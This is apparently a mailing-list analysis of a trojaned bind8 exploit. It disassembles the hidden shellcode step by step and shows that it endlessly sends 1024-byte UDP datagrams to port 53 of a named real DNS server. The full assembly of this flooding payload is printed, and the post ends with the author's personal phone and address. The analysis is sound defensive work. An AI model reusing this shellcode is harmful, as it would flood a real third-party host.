Analysis of the bind8 trojaned exploit
--------------------------------------

here's the code:

0x8049540 <shellcode>:  jmp    0x8049576 <shellcode+54>
0x8049542 <shellcode+2>:        pop    %esi
0x8049543 <shellcode+3>:        mov    $0x1,%ebx
0x8049548 <shellcode+8>:        mov    %esi,%ecx
0x804954a <shellcode+10>:       mov    $0x66,%eax
0x804954f <shellcode+15>:       int    $0x80
0x8049551 <shellcode+17>:       mov    %eax,0x14(%esi)
0x8049554 <shellcode+20>:       lea    0x30(%esi),%eax
0x8049557 <shellcode+23>:       mov    %eax,0x18(%esi)
0x804955a <shellcode+26>:       xor    %eax,%eax
0x804955c <shellcode+28>:       mov    %eax,0x20(%esi)
0x804955f <shellcode+31>:       lea    0xc(%esi),%eax
0x8049562 <shellcode+34>:       mov    %eax,0x24(%esi)
0x8049565 <shellcode+37>:       mov    $0x66,%eax
0x804956a <shellcode+42>:       mov    $0xb,%ebx
0x804956f <shellcode+47>:       lea    0x14(%esi),%ecx
0x8049572 <shellcode+50>:       int    $0x80
0x8049574 <shellcode+52>:       jmp    0x8049565 <shellcode+37>
0x8049576 <shellcode+54>:       call   0x8049542 <shellcode+2>

here's what it does:

<shellcode>:    jmp    0x8049576 <shellcode+54>
<shellcode+2>:  pop    %esi

        pop the address of the data (pushed as the return address by the call at shellcode+54) into %esi

<shellcode+3>:  mov    $0x1,%ebx
<shellcode+8>:  mov    %esi,%ecx
<shellcode+10>: mov    $0x66,%eax
<shellcode+15>: int    $0x80

        eax = 0x66 (102 is the syscall number of socketcall)
        ebx = 0x1 (1 is the call number of sys_socket)
        ecx = shellcode+59 (address of args)

        (gdb) x/3 shellcode+59
        <shellcode+59>:       0x00000002      0x00000002      0x00000011

        family = 2 (AF_INET, <linux/socket.h>)
        type = 2 (SOCK_DGRAM, <asm/socket.h>)
        protocol = 0x11 (17, UDP, <linux/in.h>)

        socket descriptor is returned in %eax

<shellcode+17>: mov    %eax,0x14(%esi)

        store the descriptor at shellcode+79

<shellcode+20>: lea    0x30(%esi),%eax

        get address of shellcode+107 (beginning of the actual exploit code) into %eax

<shellcode+23>: mov    %eax,0x18(%esi)

        store that address in shellcode+83

<shellcode+26>: xor    %eax,%eax

        zero out eax

<shellcode+28>: mov    %eax,0x20(%esi)

        store that zero at shellcode+91 (this is the flags argument; see below)

<shellcode+31>: lea    0xc(%esi),%eax

        get the address of shellcode+71 (the struct sockaddr for sendto; see below) into %eax

<shellcode+34>: mov    %eax,0x24(%esi)

        store that address into shellcode+95

<shellcode+37>: mov    $0x66,%eax
<shellcode+42>: mov    $0xb,%ebx
<shellcode+47>: lea    0x14(%esi),%ecx

        eax = 0x66 (102 is the syscall number of socketcall)
        ebx = 0xb (11 is the call number of sys_sendto)
        ecx = shellcode+79 (address of args)

        args are (int fd, void *buff, size_t len, unsigned flags, struct sockaddr *addr, int addr_len),
        thus:

        fd = [shellcode+79] = value returned by the socket call (socket descriptor)

        buff = [shellcode+83] = shellcode+107; presumably this is where the actual exploit payload is stored

        len = [shellcode+87] = 0x400, send 1024 chars
        (gdb) x/1 shellcode+87
        <shellcode+87>: 0x00000400

        flags = [shellcode+91] = 0, no special flags

        addr = [shellcode+95] = shellcode+71, this is struct sockaddr_in
        (gdb) x/10 shellcode+71
        <shellcode+71>:         0x35000002      0x960345a1      0xffffffff      0xffffffef
        <shellcode+87>:         0x00000400      0x00000000      0x809a5f02      0x00000010
        <shellcode+103>:        0x6e69622f      0x0068732f

        struct sockaddr_in {
         sa_family_t           sin_family;     /* Address family               */
         unsigned short int    sin_port;       /* Port number                  */
         struct in_addr        sin_addr;       /* Internet address             */
         ...
        };

        thus:
        sin_family = 0x0002 (AF_INET)
        sin_port = 0x3500 as read on a little-endian host, i.e. the bytes 00 35 in network byte order, which is port 53 (DNS)
        sin_addr = 0x960345a1 (bytes a1 45 03 96 in memory, i.e. 161.69.3.150, dns1.nai.com)

        addr_len = [shellcode+99] = 0x10 (16 bytes, the length of struct sockaddr)

<shellcode+50>: int    $0x80

        invoke the syscall: sendto() is executed with the arguments above

<shellcode+52>: jmp    0x8049565 <shellcode+37>

        jump back to shellcode+37: sendto() is repeated indefinitely, so the program keeps sending 1024-byte datagrams to the address above

<shellcode+54>: call   0x8049542 <shellcode+2>

        this call is reached by the initial jmp; it pushes the address of the following data (shellcode+59) as its return address, which the pop %esi at shellcode+2 then retrieves

<shellcode+59>:
        data starts here..


Lesson:
-------

Use the force, read the source!



--
Sergei Ledovskij +358(40)8245708 [EMAIL PROTECTED]
Makelankatu 91  PO. 21 Helsinki  00601 Finland
